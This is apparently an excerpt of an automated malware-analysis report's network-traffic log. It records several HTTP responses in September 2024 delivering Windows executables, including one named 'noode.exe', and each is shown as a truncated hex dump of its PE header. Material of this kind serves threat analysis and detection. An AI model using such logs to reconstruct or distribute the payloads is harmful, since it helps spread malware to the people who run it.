00 00 00 00 00 00 00 00 00 00 00 14 f9 48 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 b1 b3 00 90 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 3e 48 00 00 10 00 00 00 40 48 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 88 18 00 00 00 50 48 00 00 1a 00 00 00 46 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 38 9b 00 00 00 70 48 00 00 9c 00 00 00 60 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2f 34 00 00 00 00 00 00 e0 9d 03 00 00 10 49 00 00 9e 03 00 00 fc 48 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 54 e2 66 00 00 b0 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 42 00 00 00 00 a0 b3 00 00 02 00 00 00 9a 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 e4 09 00 00 00 b0 b3 00 00 0a 00 00 00 9c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 34 00 00 00 00 c0 b3 00 00 02 00 00 00 a6 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 d0 b3 00 00 02 00 00 00 a8 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 68 20 0e 00 00 e0 b3 00 00 22 0e 00 00 aa 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 34 00 00 00 00 00 90 06 00 00 00 10 c2 00 00 08 00 00 00 cc 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 32 39 00 00 00 00 00 c4 a7 01 00 00 20 c2 00 00 a8 01 00 00 d4 5a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 31 00 00 00 00 00 58 4c 00 00 00 d0 c3 00 00 4e 00 00 00 7c 5c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 35 00 00 00 00 00 42 e3
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 4249600Last-Modified: Sun, 15 Sep 2024 16:05:36 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66e705d0-40d800"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 5f 55 fb d1 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 9c 3e 00 00 38 02 00 00 00 00 00 ae ba 3e 00 00 20 00 00 00 c0 3e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 41 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 60 ba 3e 00 4b 00 00 00 00 e0 3e 00 84 2e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 41 00 0c 00 00 00 10 ba 3e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 9a 3e 00 00 20 00 00 00 9c 3e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 84 04 00 00 00 c0 3e 00 00 06 00 00 00 a0 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 84 2e 02 00 00 e0 3e 00 00 30 02 00 00 a6 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 41 00 00 02 00 00 00 d6 40 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.14.1Date: Sat, 21 Sep 2024 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 3143204Connection: keep-aliveX-Powered-By: PHP/7.4.33Content-Description: File TransferContent-Disposition: attachment; filename=noode.exeContent-Transfer-Encoding: binaryExpires: 0Cache-Control: must-revalidatePragma: publicData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 9e 00 00 00 46 00 00 00 00 00 00 f8 a5 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 30 9d 00 00 00 10 00 00 00 9e 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 50 02 00 00 00 b0 00 00 00 04 00 00 00 a2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 8c 0e 00 00 00 c0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 c4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 b2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:09 GMTContent-Type: application/octet-streamContent-Length: 418816Last-Modified: Sat, 21 Sep 2024 07:43:45 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ee7931-66400"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4d ba df d9 09 db b1 8a 09 db b1 8a 09 db b1 8a 66 ad 1a 8a 1b db b1 8a 66 ad 2f 8a 06 db b1 8a 66 ad 1b 8a 5c db b1 8a 00 a3 22 8a 02 db b1 8a 09 db b0 8a 86 db b1 8a 66 ad 1e 8a 08 db b1 8a 66 ad 2b 8a 08 db b1 8a 66 ad 2c 8a 08 db b1 8a 52 69 63 68 09 db b1 8a 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 12 f6 25 64 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 48 03 00 00 b4 04 02 00 00 00 00 7e 3e 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 07 02 00 04 00 00 c5 b4 06 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 4a 03 00 78 00 00 00 00 10 05 02 e8 bc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 4b 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2a 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 24 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a 47 03 00 00 10 00 00 00 48 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 8c ac 01 02 00 60 03 00 00 5a 00 00 00 4c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 bc 02 00 00 10 05 02 00 be 02 00 00 a6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:10 GMTContent-Type: application/octet-streamContent-Length: 331640Last-Modified: Sat, 21 Sep 2024 10:55:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66eea633-50f78"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3d a1 ee 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 dc 04 00 00 08 00 00 00 00 00 00 5e fb 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 08 fb 04 00 53 00 00 00 00 00 05 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 e6 04 00 78 29 00 00 00 20 05 00 0c 00 00 00 d0 f9 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 64 db 04 00 00 20 00 00 00 dc 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 00 05 00 00 06 00 00 00 de 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 fb 04 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 ea 04 00 e8 0e 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b3 c4 ec e9 36 88 b4 d0 0b 05 5a 9d a5 06 39 29 a5 e8 5e 89 9d ab ca 8a 86 a6 c2 97 d4 6a cf bf 0a e3 50 74 59 93 23 b6 c9 41 ea 52 a8 5c 17 18 f8 64 ee 84 34 14 f3 a5 37 00 5a 01 8d 26 77 8a 77 7c 93 35 da 27 3a 88 54 08 93 2a 7e e8 f4 fc 78 96 88 ad 80 54 89 de 03 37 4d d6 77 d3 53 61 c7 bb d5 91 02 51 70 05 52 aa 74 95 75 8a 8f 11 71 7a 44 28 26 84 cb 04 34 9c 8a 20 ab 3a 4f ff 64 83 8d aa 97 56 5b 9f 20 63 f0 f5 6c 9a 70 72 4b 7f 5d 9b d5 84 76 c5 c1 87 b4 59 5c 5f f0 b9 a2 7b 94 0f 0f 9c d8 27 84 a1 54 dc 2d 66 cd 16 61 76 d9 f8 e4 8c 77 28 48 93 6e 95 5d ed ae d4 96 67 70 6a 29 d0 c6 b5 0d 4f 4b 56 03 ca 13 98 1c 12 dc 71 f4 bd 51 17 0b 2a 79 0c 50 a1 21 c2 f0 59 3b 4f 2e 30 cc 8c f9 fb a3 b6 40 94 79 04 8a 0c 74 a7 22 bb 75 f6 b2 09 37 6e 92 42 95 3d 1b a8 0f b5 82 c5 e9 43 5e d8 3d 11 4d 69 88 16 91 f4 f3 10 34 95 b1 1d d9 d0 01 62 ce 9a 7e 8b 07 74 ee e2 ba 64 88 d8 2e aa e7 c4 db 23 d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:10 GMTContent-Type: application/octet-streamContent-Length: 11496960Last-Modified: Wed, 18 Sep 2024 05:25:37 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ea6451-af6e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 ad 2b dd 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 5d 70 fd 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 a8 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 d1 fd 00 3c 00 00 00 00 50 a5 01 d8 04 03 00 40 16 a5 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 46 00 01 28 00 00 00 00 15 a5 01 38 01 00 00 00 00 00 00 00 00 00 00 00 d0 f8 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 81 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b8 1e 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 e7 c9 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 70 e4 2d 00 00 e0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 d0 f8 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 a0 60 ac 00 00 e0 f8 00 00 62 ac 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d8 04 03 00 00 50 a5 01 00 06 03 00 00 68 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:12 GMTContent-Type: application/octet-streamContent-Length: 361336Last-Modified: Fri, 20 Sep 2024 18:02:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66edb89b-58378"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d b7 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 50 05 00 00 08 00 00 00 00 00 00 ee 6e 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 6e 05 00 53 00 00 00 00 80 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 5a 05 00 78 29 00 00 00 a0 05 00 0c 00 00 00 60 6d 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 4e 05 00 00 20 00 00 00 50 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 80 05 00 00 06 00 00 00 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 05 00 00 02 00 00 00 58 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 6e 05 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 5e 05 00 88 0e 00 00 03 00 02 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 9a 24 d3 fa 09 ed 73 70 1d d9 10 6b b3 54 61 ce ca 81 de fd fe 7c e7 b4 4b e4 c3 3f 77 4e 05 10 b3 2d 18 d3 6d df 0d 45 a5 89 ee 8f 43 8d 39 ec a5 d3 9d 2d 23 0f dd 0c b9 66 92 cc 3d ba 9b 1b 35 73 70 4a fe c5 d8 0f fd ee a3 7a 03 73 d5 d2 5f 34 76 15 5a 55 4f c7 91 77 a3 b4 81 62 fd 0c 01 6e 65 bf 73 52 13 b9 76 40 73 4f d6 34 d0 9d 5d 20 0d ee 1c ff 14 a1 56 c3 4c 93 f6 87 1e d4 b7 54 56 5b 1b 58 ec 76 46 04 19 02 b7 f1 c9 7c be e1 68 49 2a b7 d6 9c 24 3c 67 62 f3 e2 e1 76 2d 43 6d 3c 5b 36 52 b2 13 9f 38 a9 e7 86 21 6d 8a b8 bf ac 8c 97 be 87 8a 96 27 bd 3f 6a ee 8f d9 17 a1 57 60 4a 49 e9 c2 21 6b 0a d2 ca bf a3 e0 f1 aa c9 d5 2c 84 4f bd 3c 39 ea c1 57 a9 f9 86 58 ef 97 fe 4c 45 71 f3 d2 07 af 20 21 8c 88 cb d2 e6 f6 51 d9 a2 d9 92 24 bb 40 b3 d8 ef 03 2c 39 39 1b b7 7e 93 cc c8 25 28 f1 e4 d5 5c 16 c7 7c 42 88 1d 23 b2 61 84 fe ef 20 b5 97 d9 1c 0b 85 77 b9 ea b1 5a 56 92 ca 39 b9 6b 8
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:13 GMTContent-Type: application/octet-streamContent-Length: 3037032Last-Modified: Thu, 19 Sep 2024 05:16:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ebb3bf-2e5768"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba f7 20 98 fe 96 4e cb fe 96 4e cb fe 96 4e cb f7 ee dd cb ec 96 4e cb 60 36 89 cb ff 96 4e cb 1b cf 4b ca fc 96 4e cb 23 69 80 cb fa 96 4e cb 23 69 85 cb f0 96 4e cb c5 c8 4d ca f8 96 4e cb c5 c8 4a ca f0 96 4e cb c5 c8 4b ca df 96 4e cb c5 c8 4f ca f8 96 4e cb d9 50 35 cb fc 96 4e cb 69 c8 4f ca d3 96 4e cb fe 96 4f cb 3a 9d 4e cb 69 c8 4b ca a1 96 4e cb 69 c8 4e ca ff 96 4e cb 6c c8 b1 cb ff 96 4e cb fe 96 d9 cb ff 96 4e cb 69 c8 4c ca ff 96 4e cb 52 69 63 68 fe 96 4e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 81 9f 25 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 38 12 00 00 02 1c 00 00 00 00 00 1e 24 10 00 00 10 00 00 00 50 12 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 2e 00 00 04 00 00 9a d5 21 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 25 18 00 c4 a8 00 00 54 ce 18 00 5c 03 00 00 00 20 1b 00 d8 66 13 00 00 00 00 00 00 00 00 00 00 3e 2e 00 68 